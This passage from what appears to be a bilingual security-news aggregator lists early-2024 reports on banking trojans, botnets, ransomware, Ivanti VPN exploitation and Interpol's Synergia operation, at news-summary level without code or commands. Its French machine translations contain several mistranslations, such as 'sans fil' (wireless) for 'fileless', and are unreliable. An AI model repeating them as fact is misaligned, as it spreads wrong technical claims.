if they have the right privileges, stealing that data can be a breeze. An insider\'s goals for data theft may include fraud, the disclosure of trade secrets to a competitor for financial gain, or even corporate sabotage. As for how they can exfiltrate data, insiders can use various means, from removable media to personal email to physical printouts. How does data theft happen? Now, let\'s look at some common methods that attackers working from the outside might employ to breach a company\'s defenses and steal data. Phishing. Cybercriminals use phishing to target users through email, text messages, phone calls and other forms of communication. The core objective of this approach is to trick users into doing what | Ransomware Data Breach Malware Tool Vulnerability Threat Cloud | ★★★ | |
|
2024-02-05 09:15:00 | Nouveau Trojan bancaire Mispadu exploitant Windows SmartScreen Flaw New Mispadu Banking Trojan Exploiting Windows SmartScreen Flaw (lien direct) |
Les acteurs de la menace derrière le cheval de Troie bancaire Mispadu sont devenus les derniers à exploiter un défaut de dérivation de la sécurité SmartScreen de Windows à compromis pour compromettre les utilisateurs au Mexique.
Les attaques impliquent une nouvelle variante des logiciels malveillants qui ont été observés pour la première fois en 2019, a indiqué la Palo Alto Networks Unit 42 dans un rapport publié la semaine dernière.
Propagée via des courriers de phishing, Mispadu est un voleur d'informations basé à Delphi
The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico. The attacks entail a new variant of the malware that was first observed in 2019, Palo Alto Networks Unit 42 said in a report published last week. Propagated via phishing mails, Mispadu is a Delphi-based information stealer |
Malware Threat | ★★★ | |
|
2024-02-02 20:03:22 | La campagne MacOS malveillers présente une nouvelle technique de livraison macOS Malware Campaign Showcases Novel Delivery Technique (lien direct) |
L'acteur de menace derrière l'activateur MacOS Backdoor utilise des applications piratées pour distribuer les logiciels malveillants dans ce qui pourrait être une opération de construction de botnet.
Threat actor behind the Activator macOS backdoor is using pirated apps to distribute the malware in what could be a botnet-building operation. |
Malware Threat | ★★★ | |
|
2024-02-02 20:03:16 | Frog4Shell - FritzFrog Botnet ajoute une journée à son arsenal Frog4Shell - FritzFrog Botnet Adds One-Days to Its Arsenal (lien direct) |
#### Description
L'Akamai Security Intelligence Group (SIG) a révélé des détails sur une nouvelle variante du botnet FritzFrog, ce qui abuse de la vulnérabilité Log4Shell 2021.
Le malware infecte les serveurs orientés Internet par des informations d'identification SSH faibles à faible teneur en SSH.Les variantes plus récentes lisent désormais plusieurs fichiers système sur des hôtes compromis pour détecter les cibles potentielles pour cette attaque qui ont une forte probabilité d'être vulnérable.Le malware comprend également désormais également un module pour exploiter CVE-2021-4034, une escalade de privilège dans le composant Polkit Linux.Ce module permet aux logiciels malveillants de s'exécuter en root sur des serveurs vulnérables.
#### URL de référence (s)
1. https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-papabilities-log4shell
#### Date de publication
2 février 2024
#### Auteurs)
Ori David
#### Description The Akamai Security Intelligence Group (SIG) has uncovered details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability. The malware infects internet-facing servers by brute forcing weak SSH credentials. Newer variants now read several system files on compromised hosts to detect potential targets for this attack that have a high likelihood of being vulnerable. The malware also now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers. #### Reference URL(s) 1. https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell #### Publication Date February 2, 2024 #### Author(s) Ori David |
Malware Vulnerability Threat | ★★★ | |
|
2024-02-02 18:47:00 | Dirtymoe Malware infecte plus de 2 000 ordinateurs ukrainiens pour DDOS et cryptojacking DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking (lien direct) |
L'équipe d'intervention d'urgence informatique d'Ukraine (CERT-UA) a averti que plus de 2 000 ordinateurs du pays ont été infectés par une souche de malware appelée Dirtymoe.
L'agence & nbsp; attribué & nbsp; la campagne à un acteur de menace qu'il appelle & nbsp; UAC-0027.
Dirtymoe, actif depuis au moins 2016, est capable de procéder à des attaques de crypto-déni de service (DDOS).En mars
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe. The agency attributed the campaign to a threat actor it calls UAC-0027. DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March |
Malware Threat | ★★★ | |
|
2024-02-02 15:53:00 | INTERPOL Arrestations 31 dans le fonctionnement mondial, identifie 1 900+ IPS liés à 1 900 ransomwares INTERPOL Arrests 31 in Global Operation, Identifies 1,900+ Ransomware-Linked IPs (lien direct) |
Une opération collaborative dirigée par Interpol ciblant le phishing, les logiciels malveillants bancaires et les attaques de ransomwares a conduit à l'identification de 1 300 adresses IP suspectes et URL.
L'effort & nbsp; les forces de l'ordre, nommé par code et NBSP; Synergie, ont eu lieu entre septembre et novembre 2023 pour tenter de désactiver «la croissance, l'escalade et la professionnalisation de la cybercriminalité transnationale».
Impliquant 60 loi
An INTERPOL-led collaborative operation targeting phishing, banking malware, and ransomware attacks has led to the identification of 1,300 suspicious IP addresses and URLs. The law enforcement effort, codenamed Synergia, took place between September and November 2023 in an attempt to blunt the "growth, escalation and professionalization of transnational cybercrime." Involving 60 law |
Ransomware Malware | ★★ | |
 |
2024-02-02 13:47:24 | Grandoreiro Banking Malware a perturbé & # 8211;Semaine en sécurité avec Tony Anscombe Grandoreiro banking malware disrupted – Week in security with Tony Anscombe (lien direct) |
Le cheval de Troie bancaire, qui ciblait principalement le Brésil, le Mexique et l'Espagne, a bloqué l'écran de la victime, les touches enregistrées, les activités de souris et le clavier simulées et affiché de fausses fenêtres.
The banking trojan, which targeted mostly Brazil, Mexico and Spain, blocked the victim\'s screen, logged keystrokes, simulated mouse and keyboard activity and displayed fake pop-up windows |
Malware | ★★★ | |
|
2024-02-02 13:01:06 | La dernière intervention cybercriminale d'Interpol démantèle le ransomware, les serveurs de logiciels malveillants bancaires Interpol\\'s latest cybercrime intervention dismantles ransomware, banking malware servers (lien direct) |
Efforts Partie des opérations coordonnées internationales effectuées au cours des derniers mois Interpol a arrêté 31 personnes à la suite d'une opération de trois mois pour éradiquer divers types de cybercriminaux.…
Efforts part of internationally coordinated operations carried out in recent months Interpol has arrested 31 people following a three-month operation to stamp out various types of cybercrime.… |
Ransomware Malware | ★★★ | |
 |
2024-02-02 12:18:54 | 31 personnes arrêtées dans la répression mondiale de la cybercriminalité 31 People Arrested in Global Cybercrime Crackdown (lien direct) |
> Les forces de l'ordre dans 50 pays s'associent pour éliminer les ransomwares, les logiciels malveillants bancaires et les menaces de phishing.
>Law enforcement in 50 countries partner to take down ransomware, banking malware, and phishing threats. |
Ransomware Malware Legislation | ★★★ | |
 |
2024-02-02 10:53:15 | Les logiciels malveillants de l'activateur de porte dérobée fonctionnent dans des torrents d'applications macOS Backdoor activator malware running rife through torrents of macOS Apps (lien direct) |
Activateur de porte dérobée Running Resing Rife via des torrents d'applications macOS par Sentinelone
-
mise à jour malveillant
Backdoor activator malware running rife through torrents of macOS Apps by SentinelOne - Malware Update |
Malware | ★★★ | |
|
2024-02-02 08:27:49 | Acteurs de la menace Installation des comptes de porte dérobée Linux Threat Actors Installing Linux Backdoor Accounts (lien direct) |
AhnLab Security Intelligence Center (ASEC) utilise un pot de miel Linux SSH pour surveiller les attaques contre les systèmes Linux non spécifiés.Les acteurs de la menace installent des logiciels malveillants en lançant des attaques de force brute et du dictionnaire contre les systèmes Linux qui sont mal gérés, tels que l'utilisation de paramètres par défaut ou le mot de passe simple.Bien qu'il existe une variété de cas d'attaque, y compris ceux où les vers, les co -miners et les robots DDOS sont installés, ce message couvrira les cas d'attaque où des comptes de porte dérobée sont créés à la place des logiciels malveillants.De telles attaques ...
AhnLab SEcurity intelligence Center (ASEC) is using a Linux SSH honeypot to monitor attacks against unspecified Linux systems. Threat actors install malware by launching brute force and dictionary attacks against Linux systems that are poorly managed, such as using default settings or having a simple password. While there is a variety of attack cases including those where worms, CoinMiners, and DDoS bots are installed, this post will cover attack cases where backdoor accounts are created instead of malware. Such attacks... |
Malware Threat | ★★ | |
|
2024-02-02 07:56:28 | Interpol Operation Synergia élimine 1 300 serveurs utilisés pour la cybercriminalité Interpol operation Synergia takes down 1,300 servers used for cybercrime (lien direct) |
Une opération internationale d'application de la loi est nommé \\ 'Synergie \' a supprimé plus de 1 300 serveurs de commandement et de contrôle utilisés dans les campagnes de ransomware, de phishing et de logiciels malveillants.[...]
An international law enforcement operation code-named \'Synergia\' has taken down over 1,300 command and control servers used in ransomware, phishing, and malware campaigns. [...] |
Ransomware Malware | ★★★ | |
|
2024-02-01 21:40:33 | Trigona Ransomware Threat Actor Uses Mimic Ransomware (lien direct) | #### Description
AhnLab Security Intelligence Center (ASEC) has identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware.
The attack targets MS-SQL servers and exploits the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. The attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely. The Trigona threat actor is known to use Mimikatz to steal account credentials. The threat actor installed AnyDesk to control the infected system. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks. V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors.
#### Reference URL(s)
1. https://asec.ahnlab.com/en/61000/
#### Publication Date
January 29, 2024
#### Author(s)
Sanseo
#### Description AhnLab Security Intelligence Center (ASEC) has identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. The attack targets MS-SQL servers and exploits the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. The attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely. The Trigona threat actor is known to use Mimikatz to steal account credentials. The threat actor installed AnyDesk to control the infected system. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks. V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. #### Reference URL(s) 1. https://asec.ahnlab.com/en/61000/ #### Publication Date January 29, 2024 #### Author(s) Sanseo |
Ransomware Malware Threat | ★★★ | |
|
2024-02-01 21:14:00 | FritzFrog revient avec Log4Shell et Pwnkit, diffusant des logiciels malveillants à l'intérieur de votre réseau FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network (lien direct) |
L'acteur de menace derrière un botnet peer-to-peer (P2P) appelé & nbsp; FritzFrog & nbsp; a fait un retour avec une nouvelle variante qui exploite le & nbsp; log4shell vulnérabilité & nbsp; pour se propager en interne dans un réseau déjà compromis.
"La vulnérabilité est exploitée de manière brute-force qui tente de cibler autant d'applications Java vulnérables que possible"
The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security |
Malware Vulnerability Threat | ★★★ | |
 |
2024-02-01 16:59:36 | Comment la médecine légale a révélé l'exploitation d'Ivanti Connect Secure VPN Vulnérabilités de jour zéro How Memory Forensics Revealed Exploitation of Ivanti Connect Secure VPN Zero-Day Vulnerabilities (lien direct) |
> Dans une récente série d'articles de blog liés à deux vulnérabilités zéro-jours dans Ivanti Connect Secure VPN, les détails partagés par volexité de l'exploitation active dans la sauvage;a fourni une mise à jour sur la façon dont l'exploitation était devenue dans le monde;et des observations rapportées sur la façon dont les logiciels malveillants et les modifications de l'outil de vérificateur d'intégrité intégré ont été utilisés pour échapper à la détection.Une étude initiale critique de Volexity \\ a consisté à collecter et à analyser un échantillon de mémoire.Comme indiqué dans le premier article de blog de la série en trois parties (je souligne): «… Volexité a analysé l'un des échantillons de mémoire collectés et a découvert la chaîne d'exploitation utilisée par l'attaquant.La volexité a découvert deux exploits différents-jour qui étaient enchaînés pour réaliser l'exécution de code distant non authentifié (RCE).Grâce à l'analyse médico-légale de l'échantillon de mémoire, la volexité a pu recréer deux exploits de preuve de concept qui ont permis une exécution complète de commande non authentifiée sur l'appliance ICS VPN. »Collect & # 38;Analyser la mémoire ASAP Le volexité priorise régulièrement la criminalistique de la mémoire [& # 8230;]
>In a recent series of blog posts related to two zero-day vulnerabilities in Ivanti Connect Secure VPN, Volexity shared details of active in-the-wild exploitation; provided an update on how exploitation had gone worldwide; and reported observations of how malware and modifications to the built-in Integrity Checker Tool were used to evade detection. A critical piece of Volexity\'s initial investigation involved collecting and analyzing a memory sample. As noted in the first blog post of the three-part series (emphasis added): “…Volexity analyzed one of the collected memory samples and uncovered the exploit chain used by the attacker. Volexity discovered two different zero-day exploits which were being chained together to achieve unauthenticated remote code execution (RCE). Through forensic analysis of the memory sample, Volexity was able to recreate two proof-of-concept exploits that allowed full unauthenticated command execution on the ICS VPN appliance.” Collect & Analyze Memory ASAP Volexity regularly prioritizes memory forensics […] |
Malware Tool Vulnerability Threat Industrial | ★★★ | |
|
2024-02-01 16:52:00 | Headcrab 2.0 devient sans fil, ciblant les serveurs Redis pour l'exploitation cryptographique HeadCrab 2.0 Goes Fileless, Targeting Redis Servers for Crypto Mining (lien direct) |
Les chercheurs en cybersécurité ont détaillé une version mise à jour du malware & nbsp; headcrab & nbsp; qui est connu pour cibler les serveurs de base de données Redis à travers le monde depuis début septembre 2021.
Le développement, qui survient exactement un an après la première fois que le malware a été le premier et NBSP; divulgué publiquement & nbsp; par aqua, est un signe que l'acteur de menace motivé financièrement derrière la campagne s'adapte activement et
Cybersecurity researchers have detailed an updated version of the malware HeadCrab that\'s known to target Redis database servers across the world since early September 2021. The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and |
Malware Threat | ★★★ | |
|
2024-02-01 16:00:00 | L'initiative dirigée par Interpol cible 1300 IPS suspects Interpol-Led Initiative Targets 1300 Suspicious IPs (lien direct) |
L'effort de collaboration mondiale s'est concentré sur la lutte contre la montée mondiale du phishing, des logiciels malveillants et des ransomwares
Global collaborative effort focused on combating the global rise of phishing, malware and ransomware |
Ransomware Malware | ★★★ | |
 |
2024-02-01 15:55:08 | Interpol arrête plus de 30 cybercriminels dans l'opération globale \\ 'Synergie \\' Interpol arrests more than 30 cybercriminals in global \\'Synergia\\' operation (lien direct) |
Les forces de l'ordre internationales ont annoncé jeudi avoir détenu 31 cybercriminels présumés et identifié 1 300 serveurs malveillants qu'ils avaient utilisés pour effectuer des attaques de phishing et distribuer des logiciels malveillants.La soi-disant la synergie de l'opération d'Interpol, qui s'est déroulée de septembre à novembre 2023, «a été lancée en réponse à la croissance claire, à l'escalade et à la professionnalisation de la cybercriminalité transnationale et au besoin
International law enforcement announced Thursday that they detained 31 suspected cybercriminals and identified 1,300 malicious servers that they used to carry out phishing attacks and distribute malware. Interpol\'s so-called Operation Synergia, which ran from September to November 2023, “was launched in response to the clear growth, escalation and professionalization of transnational cybercrime and the need |
Malware | ★★★ | |
|
2024-02-01 15:52:42 | Check Point Software Technologies lance Quantum Spark 1900 et 2000 Check Point Software Technologies Launches Quantum Spark 1900 & 2000 (lien direct) |
Vérifier les technologies du logiciel Point lance Quantum Spark 1900 & 2000: Advanced Cyber Security for Pme
Les pare-feu de nouvelle génération innovants offrent une prévention améliorée des menaces d'IA jusqu'à 5 Gbps avec un taux de bloc de 99,8% contre les logiciels malveillants, le phishing et les ransomwares zéro-jour
-
revues de produits
Check Point Software Technologies Launches Quantum Spark 1900 & 2000: Advanced Cyber security for SMBs Innovative Next-Generation Firewalls Deliver Enhanced AI Threat Prevention up to 5 Gbps with a 99.8% block rate against zero-day malware, phishing, and ransomware - Product Reviews |
Malware Vulnerability Threat | ★★★ | |
|
2024-02-01 15:21:36 | Les pirates liés à l'Inde ciblent le Pakistan avec des logiciels espions dans une nouvelle campagne India-linked hackers target Pakistan with spyware in new campaign (lien direct) |
Les pirates suspects parrainés par l'État indien ont utilisé des escroqueries romantiques pour attirer les victimes du Pakistan pour installer des applications malveillantes, infectant leurs appareils par des logiciels malveillants d'espionnage, selon de nouvelles recherches.Le groupe, connu sous le nom de patchwork, a créé au moins 12 applications Android malveillantes, y compris MeetMe, le chat de Let \\, le chat rapide et le rafaqat, et les a distribués via Google Play et autres
Suspected Indian state-sponsored hackers have used romance scams to lure victims in Pakistan into installing malicious apps, infecting their devices with spying malware, according to new research. The group, known as Patchwork, created at least 12 malicious Android apps, including MeetMe, Let\'s Chat, Quick Chat, and Rafaqat, and distributed them through Google Play and other |
Malware Mobile | ★★★ | |
 |
2024-02-01 13:51:02 | Malware DarkGate : l\'exploitation des applications et services cloud (lien direct) | >De nouvelles attaques de phishing abusent des demandes de chat de groupe Microsoft Teams pour envoyer des pièces jointes malveillantes qui installent des charges utiles de malware DarkGate sur les systèmes des victimes. Les attaquants ont utilisé ce qui semble être un utilisateur (ou un domaine) Teams compromis pour envoyer plus de 1 000 invitations […] The post Malware DarkGate : l'exploitation des applications et services cloud first appeared on UnderNews. | Malware Cloud | ★★★ | |
|
2024-02-01 13:19:38 | Plus d'applications Android criblées de logiciels malveillants repérés sur Google Play More Android apps riddled with malware spotted on Google Play (lien direct) |
Un cheval de Troie à distance Android (rat) connu sous le nom de Vajraspy a été trouvé dans 12 applications malveillantes, dont six étaient disponibles sur Google Play à partir du 1er avril 2021 au 10 septembre 2023. [...]
An Android remote access trojan (RAT) known as VajraSpy was found in 12 malicious applications, six of which were available on Google Play from April 1, 2021, through September 10, 2023. [...] |
Malware Mobile | ★★★ | |
|
2024-02-01 13:13:00 | AVERTISSEMENT: de nouveaux logiciels malveillants émergent dans les attaques exploitant les vulnérabilités Ivanti VPN Warning: New Malware Emerges in Attacks Exploiting Ivanti VPN Vulnerabilities (lien direct) |
Mandiant appartenant à Google a déclaré avoir identifié de nouveaux logiciels malveillants employés par un acteur de menace d'espionnage China-Nexus connu sous le nom de UNC5221 et d'autres groupes de menaces pendant l'activité post-exploitation ciblant Ivanti Connect Secure VPN et les appareils sécurisés politiques.
Cela comprend des coquilles Web personnalisées telles que Bushwalk, Chainline, Framesting et une variante de & nbsp; Lightwire.
"Chainline est une porte dérobée Python Web Shell qui est
Google-owned Mandiant said it identified new malware employed by a China-nexus espionage threat actor known as UNC5221 and other threat groups during post-exploitation activity targeting Ivanti Connect Secure VPN and Policy Secure devices. This includes custom web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and a variant of LIGHTWIRE. "CHAINLINE is a Python web shell backdoor that is |
Malware Vulnerability Threat | ★★★ |
To see everything:
Our RSS (filtrered)
